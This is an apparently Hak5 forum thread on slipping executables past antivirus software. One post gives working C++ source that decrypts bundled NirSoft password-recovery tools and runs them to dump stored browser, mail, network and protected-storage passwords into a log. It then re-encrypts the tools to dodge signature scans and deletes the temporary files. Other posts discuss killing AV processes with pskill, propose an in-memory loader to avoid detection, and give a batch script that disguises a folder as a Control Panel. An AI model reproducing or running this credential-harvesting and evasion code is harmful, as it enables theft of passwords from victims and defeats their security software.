Jump to content

Encrypting executables


sc0rpi0

Recommended Posts

Some AV products have random names for their scanning, so looking for process names may not help in some situations.

True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry.

Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...

Link to comment
Share on other sites

Some AV products have random names for their scanning, so looking for process names may not help in some situations.

True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry.

Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...

Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask.

Although "taskill /t" may work, I would recommend using pskill from sysinternals.

I wonder...would this killing of child processes do the trick? [thinking outloud]

Not only can it kill child processes, but system processes as well. 

Link to comment
Share on other sites

Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature based AVs(please provide feedback), once they are ran, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.

/*

* AUTHOR: hexlax

*

* The encryption handling of this program is done. Please

* give me feedback if any AVs  catch it.

*

* Command line options for final product(not implemented now):

* a) -q quiet mode, nothing displays to screen

* b) -f force run anyways

*   i) if local admin privs not present

* ii) if AV is detected and forced stop failed

* iii) Places payload in danger of AV removal

* c) -c config file path [optional - default presumed]

*   i) payload list

* ii) utilities list (ccrypt, pskill, etc.)

* d) -k only attempt to kill AV, no payload run

*

*  The final product should be scalable enough for a user

* to add/delete/modify the payload by editing the config file.

*

*/

#include "stdafx.h"

#include <iostream>

#include <string>

#include <stdlib.h>

using namespace std;

//global constants

const string PAYLOAD_FILEPATH = "tools"; //TODO: insert user pref from config file.

const string ENC_KEY = "hexlax@hak5"; //TODO: insert user pref from config file.

void decrypt()

{

cout << "Decrypting payload...n";

string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;

system(syscall.c_str());

return;

}

void encrypt(){

cout << "Encrypting payload back...n";

string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;

system(syscall.c_str());

return;

}

void run_payload(){

string syscall;

cout << "Running Payload:";

//IEPV.EXE

cout << ".PSPV..";

syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp";

system(syscall.c_str());

//MSPASS.EXE

cout << ".MSPASS...";

syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp";

system(syscall.c_str());

//NETPASS.EXE

cout << ".NETPASS..";

syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp";

system(syscall.c_str());

//PSPV.EXE

cout << ".PSPV..";

syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp";

system(syscall.c_str());

//END PAYLOAD

cout << "n";

return;

}

void cleanup_temps(){

string syscall = "";

cout << "Cleaning up...n";

//consolidate our tmp files in to one

//TODO: implement the user's preference here for a

//file name & program list from config file

//TODO: after list file is done, use a for statement for cleaner code

cout << "Saving output to log.txt...n";

syscall = "type iepv.tmp >> log.txt";

system(syscall.c_str());

syscall = "type mspass.tmp >> log.txt";

system(syscall.c_str());

syscall = "type netpass.tmp >> log.txt";

system(syscall.c_str());

syscall = "type pspv.tmp >> log.txt";

system(syscall.c_str());

//get rid of *.tmp files

cout << "Removing temp files...n";

syscall = "del *.tmp";

system(syscall.c_str());

}

int main(){

decrypt();

run_payload();

encrypt();

cleanup_temps();

cout << "Scan Complete!n";

return 0;

}

Link to comment
Share on other sites

  • 11 months later...

Well, lets think outside of the box for a minute ;-)

before hand.... *payload* = "Our program that we are trying to sneak past the AV"

If I were trying to do this back in the day(MSdos 5-6.22), I would encrypt the file in a .exe loader(that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* overtop of some null-padded chunk of my loaders memory (maybe just overtop of the original .exe's memory), and restart it.....

So, maybe A loader could be written that:

A. uses the same Libs and Dll's(so they are already loaded)

B. decrypts it's payload, and overwrites itself(WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!)

C. restarts it's own execution......

Maybe this would get past the anti-virus.

I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs(.dll's) are loaded...., and once you do that, you can load the needed libs, and by-pass the whole writing to disk(I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and by-pass dectection.

I use Mcafee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not...

I'll keep ya filled in

Link to comment
Share on other sites

Well, lets think outside of the box for a minute ;-)

before hand.... *payload* = "Our program that we are trying to sneak past the AV"

If I were trying to do this back in the day(MSdos 5-6.22), I would encrypt the file in a .exe loader(that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* overtop of some null-padded chunk of my loaders memory (maybe just overtop of the original .exe's memory), and restart it.....

So, maybe A loader could be written that:

A. uses the same Libs and Dll's(so they are already loaded)

B. decrypts it's payload, and overwrites itself(WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!)

C. restarts it's own execution......

Maybe this would get past the anti-virus.

I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs(.dll's) are loaded...., and once you do that, you can load the needed libs, and by-pass the whole writing to disk(I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and by-pass dectection.

I use Mcafee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not...

I'll keep ya filled in

Funny thing here.....

By simply reversing the entire file (first byte becomes last byte, second byte becomes next to last byte, etc), My file goes totally undetected.... (DIDN'T EVEN HAVE TO CRYPT IT!!!!, just flip the script ;-) )

yep, just like I thought.... McAfee only catches it upon a disk write(I still haven't tried to execute anything from memory, but I suspect that we would kind of need to by-pass windows for that kind of functionality), So in theory we could custom load our decrypted *payload*, and run it without the AV noticing it...(this would maybe even eliminate the need for an AVkill..)

but then again, this would be a real temporary thing... I'm willing to bet tools like this are written everyday, and added to AV signature files everyday...

but remember this, If you write a nifty tool that successfully does this, everyone will want to use it, then it becomes mainstream, and then AV's will notice it, and it will get blocked by AV software ;-)

Link to comment
Share on other sites

Oh I know a way. There is a way to rename a folder using the entire path, it then appears to be a Control Panel. Of course this only works on XP. I feel I should admit. I didn't make this, I found it.

@echo off
if exist con.{21EC2020-3AEA-1069-A2DD-08002B30309D}\nul goto toggleoff
if exist Hide\nul goto toggleon
goto end
:toggleoff
move "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Hide&gt;nul
goto end
:toggleon
move Hide "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&gt;nul
:end

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...